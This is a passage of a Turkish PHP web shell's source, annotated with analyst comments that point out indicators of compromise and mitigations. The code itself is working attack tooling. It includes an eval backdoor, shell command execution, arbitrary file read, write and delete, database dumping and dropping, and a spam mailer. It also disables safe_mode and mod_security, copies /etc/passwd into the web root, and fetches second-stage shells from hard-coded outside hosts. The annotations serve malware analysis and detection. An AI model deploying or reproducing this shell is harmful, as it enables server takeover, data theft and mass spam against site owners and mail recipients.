  // - The id= values in the menu links are distinctive query strings to search for in web
  //   access logs.
  // - $_GET[id] with a bare key relies on PHP versions that treat an undefined constant
  //   as a string.
  1121. if (($id_menu != 'phpinfo') &&($id_menu!='proxy') &&($id_menu != 'fdown') &&($id_menu!='dump3r'))
  1122. {
  1123. $homedir=getcwd();
  1124. if (isset($_GET['d']))
  1125. {
  1126. $dir=realpath($_GET['d']);
  1127. }
  1128. css();
  1129. header_index();
  1130. if ($_GET[id]=='reverse'){
  1131. $site = "$_GET[site]";
  // Outbound HTTP request from the compromised host.
  1132. $kaynak = file_get_contents("http://whatisonip.com/domain-info/$site");
  1133. preg_match_all('#<a href="/redir/?(.*?)">#si',$kaynak,$kursat);
  1134. foreach($kursat[1] as $cem)
  1135. {
  1136. echo str_replace('?','',$cem).'<br>';
  1137. }
  1138. }
  1139. $site = getenv('HTTP_HOST');
  1140. echo "<font color=grey>Sunucu reverse yap:</font><a href=?id=reverse&site=$site>$site</a>";
  1141. echo '<table style="Border-Collapse: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#f6f2f2 borderColorLight=#c0c0c0 border=1>
  1142.      <tr valign="top">
  1143.      <td align="center">'.$lenguaje[52].':
  1144.      <a href="http://'.gethostbyname($_SERVER['HTTP_HOST']).'/">'.gethostbyname($_SERVER['HTTP_HOST']).'</a> |
  1145.      '.$lenguaje[53].': <b><font color="red">'.$_SERVER['REMOTE_ADDR'].'</font></b> | ';
  // Capability probes: each prints $lenguaje[54] or $lenguaje[55].
  1146. echo 'cURL: <b>';
  1147. if(function_exists('curl_version'))
  1148. {
  1149. echo '<font color=green>'.$lenguaje[54].'</font></b> | ';
  1150. }
  1151. else
  1152. {
  1153. echo '<font color=red>'.$lenguaje[55].'</font></b> | ';
  1154. }
  1155. echo 'MySQL: <b>';
  1156. if(function_exists('mysql_connect'))
  1157. {
  1158. echo '<font color=green>'.$lenguaje[54].'</font></b> | ';
  1159. }
  1160. else
  1161. {
  1162. echo '<font color=red>'.$lenguaje[55].'</font></b> | ';
  1163. }
  1164. echo 'MSSQL: <b>';
  1165. if(function_exists('mssql_connect'))
  1166. {
  1167. echo '<font color=green>'.$lenguaje[54].'</font></b> | ';
  1168. }
  1169. else
  1170. {
  1171. echo '<font color=red>'.$lenguaje[55].'</font></b> | ';
  1172. }
  1173. echo 'PostgreSQL: <b>';
  1174. if(function_exists('pg_connect'))
  1175. {
  1176. echo '<font color=green>'.$lenguaje[54].'</font></b> | ';
  1177. }
  1178. else
  1179. {
  1180. echo '<font color=red>'.$lenguaje[55].'</font></b> | ';
  1181. }
  1182. echo 'Perl: <b>';
  // This probe runs an external command on every page view that prints the header.
  1183. if (c0d3_ex3c('perl -h',$dir))
  1184. {
  1185. echo '<font color=green>'.$lenguaje[54].'</font></b> | ';
  1186. }
  1187. else
  1188. {
  1189. echo '<font color=red>'.$lenguaje[55].'</font></b> | ';
  1190. }
  1191. echo 'Oracle: <b>';
  1192. if(function_exists('ocilogon'))
  1193. {
  1194. echo '<font color=green>'.$lenguaje[54].'</font></b>';
  1195. }
  1196. else
  1197. {
  1198. echo '<font color=red>'.$lenguaje[55].'</font></b>';
  1199. }
  1200. echo '</td>
  1201.      </tr>
  1202.      <tr valign="top">
  1203.      <td align="center">'.$lenguaje[56].': '.disable_functions().'</td>
  1204.      </tr>
  1205.      </table>';
  // Tool menu; every entry is a link back to this script with a different id= value.
  1206. echo '<br />
  1207. <a href="?"><input type="submit" value="Dosya yönetimi"></a> ~  
  1208. <a href=?id=php_exec&d='.$dir.'><input type="submit" value="PHP injex"></a> ~
  1209. <a href=?id=phpini><input type="submit" value="Güvenlikleri kapat"></a> ~ <a href=?id=get><input type="submit" value="Siyanur5x"></a> ~ <a href=?id=angel><input type="submit" value="AngeLShell"></a> ~ <a href=?id=passwd><input type="submit" value="Passwd"></a> ~ <a href=?id=hta><input type="submit" value="Mod_security"></a> ~ <a href=?id=usr><input type="submit" value="Users"></a> ~ <a href=?id=cgitelnet><input type="submit" value="CGI Telnet"></a> ~ <a href=?id=tmplink><input type="submit" value="Tmplink"></a> ~ <a href=?id=php44><input type="submit" value="PHP4"></a> ~ <a href=?id=namedbypass><input type="submit" value="Auto Named"></a> ~ <a href=?id=perm><input type="submit" value="Symlink Auto"></a>
  1210. ~ <a href=?id=symlist><input type="submit" value="Symlink"></a> ~ <a href=?id=manuelsym><input type="submit" value="Manuel Symlink"></a> ~ <a href=?id=yukle><input type="submit" value="Upload"></a></font> ~ <a href=?id=passwd1><input type="submit" value="Passwd 2"></a> ~ <a href=?id=joomlares><input type="submit" value="Joomla admin resetle"></a> ~ <a href=?id=pg><input type="submit" value="Pagerank"></a></font> ~ <a href=?id=cpanel><input type="submit" value="CpanelPwn"></a></font> ~ <a href=?id=bc><input type="submit" value="BackConnect"></a></font> ~ <a href=?id=feykmail><input type="submit" value="Fake mail"></a></font> ~ <a href=?id=eval><input type="submit" value="Eval çalýþtýr"></a></font>
  1211. ~ <a href=?id=command2><input type="submit" value="Base64 Komut"></a>  ~ <a href=?id=lite1><input type="submit" value="LitespeedPwn 1"></a>  ~ <a href=?id=md5><input type="submit" value="Md5 oluþtur"></a>  ~ <a href=?id=uzakupload><input type="submit" value="Uzaktan yükle"></a>  ~ <a href=?id=komut><input type="submit" value="Komut satýrý"></a> ~ <a href=?id=whmcs><input type="submit" value="Whmcs r00t"></a> ~ <a href=?id=hash><input type="submit" value="Hash Generator"></a>  ~ <a href=?id=wpres><input type="submit" value="Wordpress admin resetle"></a>  ~ <a href=?id=shellbul><input type="submit" value="Shell bul"></a> ~ <a href=?id=reverse_dns><input type="submit" value="Reverse DNS"></a> ~
  1212. <a href=?id=crawl3r><input type="submit" value="Crawler"></a> ~ <a href=?id=mail3r><input type="submit" value="SpamMailMass"></a> ~ <a href="?id=mysql_login&d='.$dir.'"><input type="submit" value="Mysql Baðlan"></a> ~ <a href=?id=CloudBypass><input type="submit" value="CloudFlare"></a> ~ <a href=?id=sifrele><input type="submit" value="Kod þifrele"></a> ~ <a href=?id=joomla><input type="submit" value="Joomla mass hack"></a> ~ <a href=?id=vb><input type="submit" value="Vb mass hack"></a> ~ <a href=?id=wp><input type="submit" value="Wp mass hack"></a> ~ <a href=?id=Cmdinject><input type="submit" value="CMD Backdoor inject"></a> ~ <a href=?id=reversem><input type="submit" value="Reverse ip"></a>
  1213.  
  1214. ';
  1215. }
  // File-manager and code-execution actions, selected by $id_menu.
  // Analyst notes for this chain:
  // - Every path used here comes from request parameters ('d', 'a', 'd1r', 'fil3',
  //   'fil3_path', POST 'dir_name' / 'fil3_name') and is not confined to a base directory.
  // - Destructive actions are gated only by a POST flag set by the tool's own form.
  // - Distinctive parameter names (c0d3, c0d3_3x3c, ax3, fil3, fil3_down, fil3_path, d1r)
  //   are usable for access-log and WAF searches.
  // - Helper functions called here (listar_archivos, f0rm_exec, c0d3_ex3c, upload_file,
  //   rm_items_pwn, buffer_exec) are defined elsewhere in the file.
  1216. if (($id_menu == 'dir') or (!$id_menu))
  1217. {
  1218. if (trim($dir)=='')
  1219. {
  1220. $dir = getcwd();
  1221. }
  1222. listar_archivos($dir);
  1223. }
  // a_edit: file viewer/editor. POST 'c0d3' overwrites the file named by 'd' + 'a'.
  // 'w' (the base64 of a function name) picks which of three read functions is used.
  1224. elseif (($id_menu == 'a_edit') &&(!trim($_GET['d']) == '') &&(!trim($_GET['a']) == ''))
  1225. {
  1226. echo '<br /><form method="post" action="">
  1227. <input type="submit" value="Save" />
  1228. <input type="reset" value="Reset" />
  1229. <input type="button" value="Back" onclick="history.go(-1)"><br />
  1230. <br />
  1231. '.$lenguaje[60].':<br />
  1232. <a href="?id=a_edit&amp;d='.$dir.'&amp;a='.urlencode($_GET['a']).'&w='.base64_encode('fread').'">fread</a> -
  1233. <a href="?id=a_edit&amp;d='.$dir.'&amp;a='.urlencode($_GET['a']).'&w='.base64_encode('readfile').'">readfile</a> -
  1234. <a href="?id=a_edit&amp;d='.$dir.'&amp;a='.urlencode($_GET['a']).'&w='.base64_encode('file_get_contents').'">file_get_contents</a><br />
  1235.  
  1236. <br /><br />';
  1237. if (isset($_POST['c0d3']))
  1238. {
  // Arbitrary file overwrite: 'w+' truncates the target before writing.
  1239. $fopen=@fopen(realpath($dir.'/'.$_GET['a']),'w+');
  1240. $pwz=@fwrite($fopen,stripslashes($_POST['c0d3']));
  1241. @fclose($fopen);
  1242. if($pwz)
  1243. {
  1244. echo '<b>OK !!! -> <font color="green">'.$lenguaje[61].'</font></b><br />';
  1245. }
  1246. else
  1247. {
  1248. echo '<b>Err0r !!! -> <font color="red">'.$lenguaje[62].'</font></b><br />';
  1249. }
  1250. }
  1251. echo '<textarea name="c0d3" cols="80" rows="20">';
  1252. if ($_GET['w'] == base64_encode('fread'))
  1253. {
  1254. $fopen=@fopen(realpath($dir.'/'.$_GET['a']),'r');
  1255. $tam=@filesize(realpath($dir.'/'.$_GET['a']));
  1256. if ($tam >0)
  1257. {
  1258. $read=@fread($fopen,$tam);
  1259. echo htmlentities($read);
  1260. }
  1261. }
  1262. elseif ($_GET['w'] == base64_encode('readfile'))
  1263. {
  1264. ob_start('buffer_exec');
  1265. readfile(realpath($dir.'/'.$_GET['a']));
  1266. ob_end_flush();
  1267. echo $Sonuç;
  1268. }
  1269. else
  1270. {
  1271. echo htmlentities(file_get_contents(realpath($dir.'/'.$_GET['a'])));
  1272. }
  1273. echo '</textarea></form>';
  1274. }
  1275. elseif ($id_menu == 'phpinfo')
  1276. {
  1277. phpinfo();
  1278. }
  // php_exec: the POST field 'c0d3_3x3c' is evaluated as PHP in the working directory $dir.
  // This is the script's direct code-execution path.
  1279. elseif ($id_menu == 'php_exec')
  1280. {
  1281. if (isset($_POST['c0d3_3x3c']))
  1282. {
  1283. @chdir($dir);
  1284. echo '<textarea cols="100" rows="16" name="phpcode">';
  1285. ob_start('buffer_exec');
  1286. eval(stripslashes($_POST['c0d3_3x3c']));
  1287. ob_end_flush();
  1288. echo $Sonuç;
  1289. echo '</textarea><br /><br />';
  1290. }
  1291. echo $lenguaje[63].'<br />
  1292. <form method="post" action="">
  1293. <textarea name="c0d3_3x3c" cols="80" rows="12">';
  1294. if (isset($_POST['c0d3_3x3c']))
  1295. {
  1296. echo stripslashes(htmlspecialchars($_POST['c0d3_3x3c']));
  1297. }
  1298. echo '</textarea><br /><br />
  1299. <input type="submit" value="OK">
  1300. <input type="reset" value="Reset">
  1301. </form>';
  1302. }
  // upload_fil3 with a file attached: stores the upload in $dir under the client-supplied
  // name with no type or extension check. $uploadfilename and $userfilename are not
  // assigned anywhere in the visible code.
  1303. elseif (($id_menu == 'upload_fil3') &&(isset($_FILES['uploadfile'])))
  1304. {
  1305. global $_FILES;
  1306. global $dir;
  1307. $uploadfile = $_FILES['uploadfile'];
  1308. if (!empty($uploadfile['tmp_name']))
  1309. {
  1310. if (empty($uploadfilename))
  1311. {
  1312. $destin = $uploadfile['name'];
  1313. }
  1314. else
  1315. {
  1316. $destin = $userfilename;
  1317. }
  1318. if (!move_uploaded_file($uploadfile['tmp_name'],$dir.'/'.$destin))
  1319. {
  1320. echo $lenguaje[64].' '.$uploadfile['name'].' ('.$lenguaje[65].'"'.$uploadfile['tmp_name'].'" '.$lenguaje[66].' '.$dir.'"!<br />';
  1321. }
  1322. else
  1323. {
  1324. echo '<font color="green">'.$lenguaje[67].' ("'.$uploadfile['name'].'" '.$lenguaje[66].' -> '.$dir.')</font><br /><br />';
  1325. }
  1326. }
  1327. listar_archivos($dir);
  1328. }
  1329. elseif ($id_menu == 'f0rm_exec')
  1330. {
  1331. f0rm_exec($dir);
  1332. }
  // c0d3_3x3c: passes POST 'ax3' to the command helper and prints its output unescaped.
  1333. elseif ($id_menu == 'c0d3_3x3c')
  1334. {
  1335. f0rm_exec($dir);
  1336. echo '<textarea name="c0d3" cols="80" rows="20">'.c0d3_ex3c($_POST['ax3'],$dir).'</textarea><br />';
  1337. }
  1338. elseif ($id_menu == 'upload_fil3')
  1339. {
  1340. echo '<b>'.htmlentities($dir).'</b><br /><br />';
  1341. upload_file($dir);
  1342. }
  // rmdir: deletes the path in GET 'd1r' through rm_items_pwn() once POST 'rm_ok' is set.
  1343. elseif (($id_menu == 'rmdir') &&(!trim($_GET['d1r']) == ''))
  1344. {
  1345. if (isset($_POST['rm_ok']))
  1346. {
  1347. $rm_dir=rm_items_pwn(realpath($_GET['d1r'].'/'));
  1348. if($rm_dir)
  1349. {
  1350. echo '<b><font color="green">'.$lenguaje[68].'! -> '.htmlentities(stripslashes($_GET['d1r'])).'</font></b><br /><br />';
  1351. }
  1352. else
  1353. {
  1354. echo '<b><font color="red">Err0r !!! -> '.htmlentities(stripslashes($_GET['d1r'])).'</font></b><br /<br />';
  1355. }
  1356. listar_archivos($dir);
  1357. }
  1358. else
  1359. {
  1360. echo $lenguaje[88].' <font color="red"><b>'.htmlentities(stripslashes($_GET['d1r'])).'</b></font> ?<br />
  1361.         <form action="" method="POST">
  1362.         <input type="hidden" name="rm_ok" value="1">
  1363.         <br />
  1364.         <input type="submit" value="SI">
  1365.         <form>
  1366.         <br /><br />';
  1367. }
  1368. }
  // rm_file: unlinks the path in GET 'fil3' once POST 'rm_ok' equals 1.
  1369. elseif (($id_menu == 'rm_file') &&(!trim($_GET['fil3']) == ''))
  1370. {
  1371. if ((isset($_POST['rm_ok'])) &&($_POST['rm_ok']==1))
  1372. {
  1373. $unlink_fil3=@unlink($_GET['fil3']);
  1374. if($unlink_fil3)
  1375. {
  1376. echo '<b><font color="green">'.$lenguaje[69].'! -> '.htmlentities(stripslashes($_GET['fil3'])).'</font></b><br /><br />';
  1377. }
  1378. else
  1379. {
  1380. echo '<b><font color="red">Err0r !!!  -> '.htmlentities(stripslashes($_GET['fil3'])).'</font></b><br /><br />';
  1381. }
  1382. listar_archivos($dir);
  1383. }
  1384. else
  1385. {
  1386. echo $lenguaje[87].' <font color="red"><b>'.htmlentities(stripslashes($_GET['fil3'])).'</b></font> ?<br /><form action="" method="POST">
  1387.         <input type="hidden" name="rm_ok" value="1">
  1388.         <br />
  1389.         <input type="submit" value="SI">
  1390.         <form>
  1391.         <br /><br />';
  1392. }
  1393. }
  // mkdir: creates POST 'dir_name' under $dir.
  1394. elseif (($id_menu == 'mkdir') &&(!trim($_GET['d']) == ''))
  1395. {
  1396. if (isset($_POST['dir_name']))
  1397. {
  1398. $mkdir_f=@mkdir($dir.'/'.trim($_POST['dir_name']));
  1399. if($mkdir_f)
  1400. {
  1401. echo '<b><font color="green">'.$lenguaje[70].'! -> '.htmlentities($_POST['dir_name']).'</font></b><br /><br />';
  1402. }
  1403. else
  1404. {
  1405. echo '<b><font color="red">Err0r !!!</font></b><br /><br />';
  1406. }
  1407. }
  1408. else
  1409. {
  1410. echo '<form method="post" action="">
  1411.          <table width="214" border="0" cellspacing="0" cellpadding="0">
  1412.          <tr valign="top">
  1413.          <td width="58" height="30">'.$lenguaje[71].': </td>
  1414.          <td width="144"><input type="text" name="dir_name" /></td>
  1415.          </tr>
  1416.          <tr valign="top" align="center">
  1417.          <td colspan="2"><input type="submit" value="'.$lenguaje[72].'" /></td>
  1418.          </tr>
  1419.          </table>
  1420.          </form>';
  1421. }
  1422. listar_archivos($dir);
  1423. }
  // mkfile: writes POST 'fil3_content' to a new file named by POST 'fil3_name' under $dir.
  // New script files appearing in a web root are the on-disk trace of this action.
  1424. elseif (($id_menu == 'mkfile') &&(isset($_GET['d'])))
  1425. {
  1426. if (isset($_POST['fil3_name']))
  1427. {
  1428. $fopen=@fopen($dir.'/'.$_POST['fil3_name'],'w+');
  1429. @fwrite($fopen,stripslashes($_POST['fil3_content']));
  1430. @fclose($fopen);
  1431. if($fopen)
  1432. {
  1433. echo '<b><font color="green">'.$lenguaje[73].'! -> '.htmlentities($_POST['fil3_name']).'</font></b><br /><br />';
  1434. }
  1435. else
  1436. {
  1437. echo '<b><font color="red">Err0r!!!</font></b><br /><br />';
  1438. }
  1439. listar_archivos($dir);
  1440. }
  1441. else
  1442. {
  1443. echo '<form method="post" action="">
  1444.          <table border="0" cellspacing="0" cellpadding="0">
  1445.          <tr valign="top">
  1446.          <td height="30">'.$lenguaje[74].': </td>
  1447.          <td width="140">
  1448.          <input type="text" name="fil3_name" />
  1449.          </td>
  1450.          </tr>
  1451.          <tr valign="top" align="center">
  1452.          <td colspan="2"><input type="submit" value="'.$lenguaje[75].'" /></td>
  1453.          </tr>
  1454.          </table>
  1455.          <br />
  1456.          <textarea name="fil3_content" cols="80" rows="12"></textarea>
  1457.          </form>';
  1458. }
  1459. }
  // fdown: streams the file at GET 'fil3_path' to the client as an attachment, giving
  // arbitrary file read with the web server's privileges. The full path is in the query
  // string, so access logs show which files were taken.
  1460. elseif (($id_menu == 'fdown') &&(!trim($_GET['fil3_down']) == ''))
  1461. {
  1462. if (!trim($_GET['fil3_path'])=='')
  1463. {
  1464. $fil3_down=str_replace(' ','_',$_GET['fil3_down']);
  1465. $fil3_path=$_GET['fil3_path'];
  1466. $fp = @fopen($fil3_path,'rb');
  1467. header('Content-Disposition: attachment; filename='.$fil3_down);
  1468. header('Content-Length: '.filesize($fil3_path));
  1469. fpassthru($fp);
  1470. @fclose($fp);
  1471. }
  1472. else
  1473. {
  1474. $homedir=getcwd();
  1475. $dir=realpath($_GET['d']);
  1476. css();
  1477. header_index();
  1478. echo $lenguaje[76].' <br /> <br />';
  1479. echo '<a href="'.$_SERVER['SCRIPT_NAME'].'">'.$lenguaje[77].'</a>';
  1480. }
  1481. }
  // Database, mailer and miscellaneous actions, selected by $id_menu.
  // Analyst notes for this chain:
  // - MySQL credentials travel in the query string (userm, passm, hostm). After login they
  //   are only base64-encoded, not encrypted, so access logs, proxy logs and Referer
  //   headers can reveal which database accounts were used and need rotating.
  // - $hostm, $userm and $passm are decoded from the request at the top of the file.
  // - post_form_mysql(), listar_dbs(), listar_tbs(), ver_schema(), paginar(),
  //   mostrar_datos() and login_form_mysql() are defined elsewhere in the file.
  1482. if ($id_menu=='log_mysql')
  1483. {
  1484. if ((!$_GET['userm']=='') &&(!$_GET['hostm']==''))
  1485. {
  1486. if (post_form_mysql($_GET['hostm'],$_GET['userm'],$_GET['passm']))
  1487. {
  1488. echo '<div align="center">'.$lenguaje[78].': <br /><br />
  1489.              <a href="?id=listar_dbs&userm='.base64_encode($_GET['userm']).'&passm='.base64_encode($_GET['passm']).'&hostm='.base64_encode($_GET['hostm']).'">'.$lenguaje[79].'</a><br />
  1490.              <a href="?">'.$lenguaje[80].'</a></div>';
  1491. }
  1492. else
  1493. {
  1494. echo $lenguaje[81];
  1495. }
  1496. }
  1497. else
  1498. {
  1499. echo 'Error<br />';
  1500. }
  1501. }
  1502. elseif ($id_menu=='listar_dbs')
  1503. {
  1504. if (post_form_mysql($hostm,$userm,$passm))
  1505. {
  1506. listar_dbs();
  1507. }
  1508. else
  1509. {
  1510. echo $lenguaje[81];
  1511. }
  1512. }
  1513. elseif ($id_menu=='list_tb')
  1514. {
  1515. if (post_form_mysql($hostm,$userm,$passm))
  1516. {
  1517. listar_tbs($_GET['dbname']);
  1518. }
  1519. else
  1520. {
  1521. echo $lenguaje[81];
  1522. }
  1523. }
  1524. elseif (($id_menu=='ver_schema') &&(!$_GET['tbname']=='') &&(!$_GET['db']==''))
  1525. {
  1526. if (post_form_mysql($hostm,$userm,$passm))
  1527. {
  1528. ver_schema($_GET['tbname'],$_GET['db']);
  1529. }
  1530. else
  1531. {
  1532. echo $lenguaje[81];
  1533. }
  1534. }
  // mostrar_datos: pages through table contents, 30 rows per page.
  1535. elseif (($id_menu=='mostrar_datos') &&(!$_GET['tbname']==''))
  1536. {
  1537. if (post_form_mysql($hostm,$userm,$passm))
  1538. {
  1539. echo '<a href="?id=list_tb&userm='.htmlspecialchars($_GET['userm']).'&passm='.htmlspecialchars($_GET['passm']).'&hostm='.htmlspecialchars($_GET['hostm']).'&dbname='.htmlspecialchars($_GET['db']).'">'.$lenguaje[25].'</a><br /><br />';
  1540. $paginaz=$_GET[pag];
  1541. if (trim($paginaz)=='')
  1542. {
  1543. $paginaz=0;
  1544. }
  1545. if (is_numeric($paginaz))
  1546. {
  1547. paginar($_GET['tbname'],$_GET['db']);
  1548. echo '<br />';
  1549. mostrar_datos($_GET['tbname'],$_GET['db'],$paginaz,30);
  1550. }
  1551. }
  1552. else
  1553. {
  1554. echo $lenguaje[81];
  1555. }
  1556. }
  // dump3r: database/table export. Unlike the neighbouring branches it does not call
  // post_form_mysql() first.
  1557. elseif (($id_menu=='dump3r') &&(isset($_GET['db'])))
  1558. {
  1559. if (isset($_GET['tablename']))
  1560. {
  1561. dump3r($userm,$passm,$hostm,$_GET['db'],$_GET['tablename']);
  1562. }
  1563. else
  1564. {
  1565. dump3r($userm,$passm,$hostm,$_GET['db'],'');
  1566. }
  1567. }
  1568. elseif (($id_menu=='drop_db') &&(!$_GET['dbname']==''))
  1569. {
  1570. if (post_form_mysql($hostm,$userm,$passm))
  1571. {
  1572. drop_db($_GET['dbname']);
  1573. }
  1574. else
  1575. {
  1576. echo $lenguaje[81];
  1577. }
  1578. }
  1579. elseif (($id_menu=='drop_tb') &&(!$_GET['dbname']=='') &&(!$_GET['tbname']==''))
  1580. {
  1581. if (post_form_mysql($hostm,$userm,$passm))
  1582. {
  // Note: 'tbname' is passed for both arguments, so the database-name argument of
  // drop_tb() receives the table name.
  1583. drop_tb($_GET['tbname'],$_GET['tbname']);
  1584. }
  1585. else
  1586. {
  1587. echo $lenguaje[81];
  1588. }
  1589. }
  1590. elseif ($id_menu=='mysql_login')
  1591. {
  1592. login_form_mysql();
  1593. }
  // mail3r: bulk mailer. On POST, one mail() call is made per line of 'maillist'.
  // - '&email&' in the subject and body is replaced with the current recipient.
  // - The From name/address and the HTML body are taken from the POST body unfiltered;
  //   the body is appended to the header block and the message argument is left empty.
  // - split() and ereg_replace() were removed from PHP in version 7.
  // - Indicators: bursts of outbound mail from the web server account, POSTs to id=mail3r.
  1594. elseif ($id_menu=='mail3r')
  1595. {
  1596. if (!$_POST)
  1597. {
  1598. form_mailer();
  1599. }
  1600. else
  1601. {
  1602. form_mailer();
  1603. $paratal_emails = split("
  1604. ",$_POST['maillist']);
  1605. $count_emails = count($paratal_emails);
  1606. for($x=0;$x<$count_emails;$x++)
  1607. {
  1608. $para = $paratal_emails[$x];
  1609. if ($para)
  1610. {
  1611. $contenido = ereg_replace('&email&',$para,$_POST['contenido']);
  1612. $titulo = ereg_replace('&email&',$para,$_POST['titulo']);
  1613. $header  = "From: $_POST[nombre] <$_POST[email]>
  1614. ";
  1615. $header .= "MIME-Version: 1.0
  1616. ";
  1617. $header .= "Content-Type: text/html
  1618. ";
  1619. $header .= "Content-Transfer-Encoding: 8bit
  1620.  
  1621. ";
  1622. $header .= "$contenido
  1623. ";
  1624. if(mail($para,$titulo,'',$header))
  1625. {
  1626. print '<b>'.$para.'</b> -->> '.$lenguaje[82].'<br />';
  1627. }
  1628. else
  1629. {
  1630. echo '<b>'.$para.'</b> -->> '.$lenguaje[83].'<br />';
  1631. }
  1632. }
  1633. flush();
  1634. ob_flush();
  1635. }
  1636. echo 'Fin :D';
  1637. }
  1638. }
  1639. elseif ($id_menu=='crawl3r')
  1640. {
  1641. crawl3r();
  1642. }
  // checkbox_form: bulk delete of the entries ticked in the file listing.
  1643. elseif ($id_menu=='checkbox_form')
  1644. {
  1645. if ($_POST['menu_dirs'] == 'borrar')
  1646. {
  1647. if ((isset($_POST['directorios_confirmados'])) or (isset($_POST['archivos_confirmados'])) or (isset($_POST['directorios'])) or (isset($_POST['archivos'])))
  1648. {
  1649. @borrrar_checkbox(realpath($_POST['dir']),$_POST['directorios'],$_POST['archivos']);
  1650. }
  1651. else
  1652. {
  1653. echo $lenguaje[95].'<br /><br />';
  1654. }
  1655. }
  1656. }
  1657. elseif (($id_menu=='pwn_chmod') &&(isset($_GET['pwnd'])))
  1658. {
  1659. pwn_chmod($_GET['pwnd']);
  1660. }
  1661. elseif ($id_menu=='reverse_dns')
  1662. {
  1663. reverse_dns();
  1664. }
  // Closes the page wrapper for every action that printed the HTML header.
  1665. if (($id_menu!='phpinfo') &&($id_menu!='fdown') &&($id_menu!='dump3r') &&($id_menu!='proxy'))
  1666. {
  1667. echo '<br />
  1668.  
  1669.      </div>';
  1670. }
  // id=info: prints phpinfo(), disclosing the full PHP configuration to the requester.
  1671. if ($_GET[id]=='info'){
  1672. phpinfo();
  1673. }
  // id=phpini: writes a php.ini into the script's working directory that sets safe_mode
  // off and disable_functions to NONE. Whether PHP honours a per-directory php.ini depends
  // on the SAPI and server configuration.
  // Indicator: an unexpected php.ini in a web directory containing these two lines.
  // Return values of fopen()/fwrite() are not checked.
  1674. if ($_GET[id]=='phpini'){
  1675. $File = 'php.ini';
  1676. $Handle = fopen($File,'w');
  1677. $Data = "safe_mode = off
  1678. ";
  1679. fwrite($Handle,$Data);
  1680. $Data = "disable_functions = NONE
  1681. ";
  1682. fwrite($Handle,$Data);
  1683. print 'Baþarýlý!!';
  1684. fclose($Handle);
  1685. }
  // id=get / id=angel: second-stage droppers. Each downloads a text file from a hard-coded
  // remote URL and saves it as a .php file in the script's working directory.
  // Indicators: the file names Siyanur5x.php and angel.php, and outbound HTTP requests
  // from the web server to the host named in the URLs below.
  // The download result is not checked, so a failed fetch still leaves a .php file behind.
  1686. if ($_GET[id]=='get'){
  1687. $file = file_get_contents('http://kordonfilm.com/priv/Siyanur5xFull.txt');
  1688. $b = fopen('Siyanur5x.php','w');
  1689. fwrite($b,$file);
  1690. fclose($b);
  1691. print 'Baþarýlý ! <a href=Siyanur5x.php></a>';
  1692. }
  1693. if ($_GET[id]=='angel'){
  1694. $file = file_get_contents('http://kordonfilm.com/priv/4ngel.txt');
  1695. $b = fopen('angel.php','w');
  1696. fwrite($b,$file);
  1697. fclose($b);
  1698. print 'Baþarýlý ! <a href=angel.php></a>';
  1699. }
  1700. if ($_GET[id]=='passwd'){
        // Account enumeration: shells out to copy /etc/passwd into passwd.txt in the web-served
        // working directory, then links to it. $output is never used (the shell redirect leaves
        // nothing on stdout), and the success message is printed whether or not the command worked.
        // Indicators: `cat` spawned by the web-server/PHP user; a passwd.txt under the document root.
        // Mitigation: list shell_exec and the other process functions in disable_functions.
  1701. $output = shell_exec('cat /etc/passwd > passwd.txt');
  1702. echo 'Baþarýlý ! <a href=passwd.txt>passwd.txt</a>';
  1703. }
  1704. if ($_GET[id]=='usr'){
        // Account enumeration by side channel: lists /var/mail (one spool entry per local user,
        // presumably) into users.txt in the web-served working directory. The success message is
        // unconditional.
        // Indicators: `ls /var/mail` spawned by the PHP user; a users.txt under the document root.
        // Mitigation: disable shell_exec and friends; /var/mail need not be listable by the web user.
  1705. $output = shell_exec('ls /var/mail > users.txt');
  1706. echo 'Baþarýlý ! <a href=users.txt>users.txt</a>';
  1707. }
  1708. if ($_GET[id]=='hta'){
        // WAF tamper: overwrites .htaccess in the current directory ('w+' truncates whatever site
        // rules were there) with a block guarded by <IfModule mod_security.c> that sets four
        // engine/scan/encoding switches to Off.
        // NOTE(review): the directive names as pasted are not valid ModSecurity directives; they
        // look like a mangled form of the ModSecurity 1.x SecFilter* family -- presumably altered
        // by the decoder or a word filter. Treat the intent (per-directory WAF disable) as the finding.
        // Detection: .htaccess modified by the web-server user; an IfModule mod_security block in
        // any .htaccess. Mitigation: restrict AllowOverride so .htaccess cannot carry module
        // directives, and keep WAF policy in server-level configuration only.
  1709. $File = '.htaccess';
  1710. $Handle = fopen($File,'w+');
  1711. $Data = '<IfModule mod_security.c>
  1712. FucKFilterEngine Off
  1713. FucKFilterScanPOST Off
  1714. FucKFilterCheckURLEncoding Off
  1715. FucKFilterCheckUnicodeEncoding Off
  1716. </IfModule>';
  1717. fwrite($Handle,$Data);
  1718. print 'Baþarýlý!!';
  1719. fclose($Handle);
  1720. }
  1721. if ($_GET[id]=='cgitelnet'){
        // Installs a CGI shell in two steps: (1) overwrites .htaccess so that files ending in
        // .truy run as CGI scripts, (2) downloads a script from a hard-coded URL, saves it as
        // mectruy.truy and marks it executable (0755).
        // Indicators: .htaccess containing ExecCGI plus an AddHandler cgi-script line for an odd
        // extension; a *.truy file in the document root; outbound HTTP to the host named below.
        // Mitigation: AllowOverride without Options/FileInfo so .htaccess cannot enable ExecCGI or
        // add handlers; allow_url_fopen=Off; non-writable document root.
  1722. $kokdosya = '.htaccess';
  1723. $dosya_adi = "$kokdosya";
  1724. $dosya = fopen ($dosya_adi ,'w') or die ('Dosya açýlamadý!');
  1725. $metin = 'Options FollowSymLinks MultiViews Indexes ExecCGI
  1726. AddType application/x-httpd-cgi .truy
  1727. AddHandler cgi-script .truy
  1728. AddHandler cgi-script .truy';
  1729. fwrite ( $dosya ,$metin ) ;
  1730. fclose ($dosya);
        // The target file is created before the download is attempted, so a failed fetch still
        // leaves an empty mectruy.truy behind.
  1731. $file = fopen('mectruy.truy','w+');
  1732. $sa=file_get_contents('http://firmareklam.net/box/cgitelnet.txt');
  1733. $write = fwrite ($file ,$sa);
  1734. fclose($file);
  1735. if ($write) {
        // The success message discloses the dropped shell's login password in clear text.
  1736. echo "<b><a href='mectruy.truy'>mectruy.truy</a></b> adýnda Cgitelnet oluþturuldu.<br>.htaccess .truy uzantýya destek verecek þekilde düzenlendi<br>Telnet giriþ þifresi<b><font color=red>mectruy</font></b></br>";
  1737. }
  1738. else {echo'"error"';}
  1739. $chm = chmod('mectruy.truy',0755);
  1740. if ($chm == true){
  1741. echo 'Chmod 755 olarak ayarlandý';
  1742. }else{
  1743. echo 'chmod verilemedi';
  1744. }
  1745. }
  1746. if ($_GET[id]=='tmplink'){
